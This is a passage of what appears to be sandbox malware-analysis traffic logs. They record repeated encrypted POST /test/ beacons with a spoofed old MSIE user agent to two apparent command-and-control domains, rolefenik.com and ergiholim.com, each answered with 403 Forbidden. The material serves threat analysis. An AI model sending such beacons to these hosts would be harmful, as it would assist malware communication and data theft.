                                                                                                                                          2024-11-13 17:23:42 UTC    5    IN    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session ID    Source IP    Source Port    Destination IP    Destination Port
                                                                                                                                          84    192.168.2.6    50081    104.21.92.105    443
                                                                                                                                          Timestamp    Bytes transferred    Direction    Data
                                                                                                                                          2024-11-13 17:23:43 UTC    415    OUT    POST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: rolefenik.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2024-11-13 17:23:43 UTC    92    OUT    Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:23:44 UTC    750    IN    HTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:23:44 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XKUvBUaO%2BtY9Pf%2Bcuumq09WIFjp2c2o33hdYmurBZn2K99YOOBfQIXzqE9tCggIndJWGZiTjY%2BI6vhCcpq4ICWi1RHfXu%2FVjzdUZ6nVNUwUZdbtNL92rkQXhaiYDDaNv"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e2073857fe2f5a3-NRT
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=152051&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2829&recv_bytes=1167&delivery_rate=19850&cwnd=32&unsent_bytes=0&cid=ed0e900ea97c8292&ts=732&x=0"
                                                                                                                                          2024-11-13 17:23:44 UTC    555    IN    Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                                                                                                                                          2024-11-13 17:23:44 UTC    5    IN    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session ID    Source IP    Source Port    Destination IP    Destination Port
                                                                                                                                          85    192.168.2.6    50082    104.21.15.162    443
                                                                                                                                          Timestamp    Bytes transferred    Direction    Data
                                                                                                                                          2024-11-13 17:23:44 UTC    415    OUT    POST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: ergiholim.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2024-11-13 17:23:44 UTC    92    OUT    Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:23:45 UTC    755    IN    HTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:23:45 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LgWNhYSaoyJOWiPDTGA5g%2F7ZrrfZX4iDwuulk7M07xt0bTCEVgjxjsL%2FvVBIWY%2FZ0Kck%2FU7V9AF4uhNd99TZ92nkJgraZJG4dVQh%2F4dDwdyIOKTMOxL7YX0D%2BdSaBVRL"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e20738d7d266c0d-DFW
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1308&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1167&delivery_rate=2112326&cwnd=251&unsent_bytes=0&cid=25c9c3ee4ded2a4e&ts=422&x=0"
                                                                                                                                          2024-11-13 17:23:45 UTC    555    IN    Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                                                                                                                                          2024-11-13 17:23:45 UTC    5    IN    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session ID    Source IP    Source Port    Destination IP    Destination Port
                                                                                                                                          86    192.168.2.6    50083    104.21.92.105    443
                                                                                                                                          Timestamp    Bytes transferred    Direction    Data
                                                                                                                                          2024-11-13 17:23:46 UTC    415    OUT    POST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: rolefenik.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2024-11-13 17:23:46 UTC    92    OUT    Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:23:46 UTC    752    IN    HTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:23:46 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mrwjC4qddBdn9lmfRTEMi525y39evnF0SOvFzbYHIAajVi8niqOXj6EwR%2F%2FQcWrhRn4M3L3td%2FKCPI%2B7lLglzIRCvI4X4TexZgi6ADx46Ox8PUNA8bnyIoPiK5ao%2FeWS"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e2073961ab0795e-NRT
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=142635&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1167&delivery_rate=20311&cwnd=32&unsent_bytes=0&cid=e149ad309aa58f3d&ts=744&x=0"
                                                                                                                                          2024-11-13 17:23:46 UTC | 555 | IN | Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                                                                                                                                          2024-11-13 17:23:46 UTC | 5 | IN | Data Ascii: 0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                          87 | 192.168.2.6 | 50084 | 104.21.15.162 | 443
                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                          2024-11-13 17:23:47 UTC | 415 | OUT | POST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: ergiholim.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2024-11-13 17:23:47 UTC | 92 | OUT | Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:23:48 UTC | 748 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:23:48 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MqMvV1Xx4MdMXw%2FU06YO3ZRXAUKVdAdI4g9quOnQhsOwf1UdbLWvLLK3lwBTC29%2FUjL6CaPjeTLRje4MxIQ07sTKoW%2BYWefhp1NiBxd5mtVEq1Hpx87TL6xKhrPSbDbn"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e2073a01c227346-NRT
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=130070&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2832&recv_bytes=1167&delivery_rate=22263&cwnd=32&unsent_bytes=0&cid=e26b5a25835c5e92&ts=783&x=0"
                                                                                                                                          2024-11-13 17:23:48 UTC | 555 | IN | Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                                                                                                                                          2024-11-13 17:23:48 UTC | 5 | IN | Data Ascii: 0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                          88 | 192.168.2.6 | 50085 | 104.21.92.105 | 443
                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                          2024-11-13 17:23:49 UTC | 415 | OUT | POST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: rolefenik.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2024-11-13 17:23:49 UTC | 92 | OUT | Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:23:49 UTC | 755 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:23:49 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xAl5KbUg4duCxs8%2FGiy1oqHjkB4Jzqwv7GEtknhFs8FEKmdncIp3fysdL2r%2BRm2lzdVN8%2BxGTmkOiVnA8UKo%2BQXmTNmRQQZd%2BKfQ0wVDNCLeq8fOml%2BinkPHFVILZ4da"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e2073a8d8086b27-DFW
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1141&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1167&delivery_rate=2592658&cwnd=249&unsent_bytes=0&cid=cc97e5480558a86b&ts=464&x=0"
                                                                                                                                          2024-11-13 17:23:49 UTC | 555 | IN | Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                                                                                                                                          2024-11-13 17:23:49 UTC | 5 | IN | Data Ascii: 0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                          89 | 192.168.2.6 | 50086 | 104.21.15.162 | 443
                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                          2024-11-13 17:23:50 UTC | 415 | OUT | POST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: ergiholim.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2024-11-13 17:23:50 UTC | 92 | OUT | Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:23:51 UTC | 756 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:23:51 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Wcpvqb%2B9Ciq85jJZe3uw%2F1n0c8Ow0Wlk6izM0ey5IDLfNm%2BtN0Mxcd1DwjWu3kDkG2v%2BW0tlHqgbQJ4koeWCoY%2FKO3aNrXRr%2Fg8lBlGCUVb90qC2HY9euM6W%2B0W5aFB4"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e2073b14fd86879-NRT
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=135700&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1167&delivery_rate=21335&cwnd=32&unsent_bytes=0&cid=25dfbc323f69631a&ts=785&x=0"
                                                                                                                                          2024-11-13 17:23:51 UTC | 555 | IN | Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                                                                                                                                          2024-11-13 17:23:51 UTC | 5 | IN | Data Ascii: 0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                          90 | 192.168.2.6 | 50087 | 104.21.92.105 | 443
                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                          2024-11-13 17:23:52 UTC | 415 | OUT | POST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: rolefenik.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2024-11-13 17:23:52 UTC | 92 | OUT | Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:23:52 UTC | 744 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:23:52 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fVmTE6zhwtZ7xpN7DSa5mKLD4zOVhUdVy1Pggz3lXJQv9ScAn6TtSF9PgD5l82zP8udsHBCXy2xs%2BtDMcLc4Rq0GJ79UI7euTUuITHdbrKNmVZFR6QfRFkktoAWz3Jwz"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e2073bc6b1ad78b-NRT
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=135673&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2829&recv_bytes=1167&delivery_rate=20600&cwnd=32&unsent_bytes=0&cid=e24d933cc66df834&ts=506&x=0"
                                                                                                                                          2024-11-13 17:23:52 UTC | 555 | IN | Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                                                                                                                                          2024-11-13 17:23:52 UTC | 5 | IN | Data Ascii: 0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                          91 | 192.168.2.6 | 50088 | 104.21.15.162 | 443
                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                          2024-11-13 17:23:53 UTC | 415 | OUT | POST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: ergiholim.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2024-11-13 17:23:53 UTC | 92 | OUT
                                                                                                                                          Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:23:54 UTC | 750 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:23:54 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5%2BvFuXqEt%2FXb6WqxKfA8h%2FFhirw84zY0xUgHMXVA04aPRbKDYZHi0GyLOJdog2z1nqO6YEG05T8EIlXDjw4t6OL3rP1BCfG%2BMIDk9qS4zJD9X4tBkQQLUodINOTa9jTj"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e2073c52d517368-NRT
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=135254&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1167&delivery_rate=18139&cwnd=32&unsent_bytes=0&cid=94a472d9aea34c11&ts=564&x=0"
                                                                                                                                          2024-11-13 17:23:54 UTC | 555 | IN
                                                                                                                                          Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                                                                                                                                          2024-11-13 17:23:54 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                          92 | 192.168.2.6 | 50089 | 104.21.92.105 | 443
                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                          2024-11-13 17:23:54 UTC | 415 | OUT | POST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: rolefenik.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2024-11-13 17:23:54 UTC | 92 | OUT
                                                                                                                                          Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:23:55 UTC | 753 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:23:55 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JMYgdLoiX0qP5bYgaVFC91CmiaK0KH6n%2BOFTwmvgV6tKFNE5nxIUbUvMV0b%2Ffiq6M%2FZcrslMMo6k3ASARwtBHv28TKMr0DBk0eQ%2Boq8OdhdpAQQ2SETT%2BQSYGsyppZlN"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e2073cc8e5e2e25-DFW
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1592&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1167&delivery_rate=1728955&cwnd=251&unsent_bytes=0&cid=311b3fcb1717a73b&ts=405&x=0"
                                                                                                                                          2024-11-13 17:23:55 UTC | 555 | IN
                                                                                                                                          Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                                                                                                                                          2024-11-13 17:23:55 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                          93 | 192.168.2.6 | 50090 | 104.21.15.162 | 443
                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                          2024-11-13 17:23:56 UTC | 415 | OUT | POST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: ergiholim.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2024-11-13 17:23:56 UTC | 92 | OUT
                                                                                                                                          Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:23:56 UTC | 748 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:23:56 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=thQ1X9%2Bnk11UoQuKmKffgs6LnSXYQBUJbWNJWUtPF2FaeJ1Q2yt9Ot4Gr1NNjQ%2BWW3qbKUEVcIjLa3tPUIOqS0ButxqkoY2zLJ9yOwmrLiTD5gw48%2B25O2rkrFzkd0Hc"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e2073d4ca7dd78b-NRT
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=131116&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1167&delivery_rate=22074&cwnd=32&unsent_bytes=0&cid=0be484981a27ec58&ts=534&x=0"
                                                                                                                                          2024-11-13 17:23:56 UTC | 555 | IN
                                                                                                                                          Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                                                                                                                                          2024-11-13 17:23:56 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                          94 | 192.168.2.6 | 50091 | 104.21.92.105 | 443
                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                          2024-11-13 17:23:57 UTC | 415 | OUT | POST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
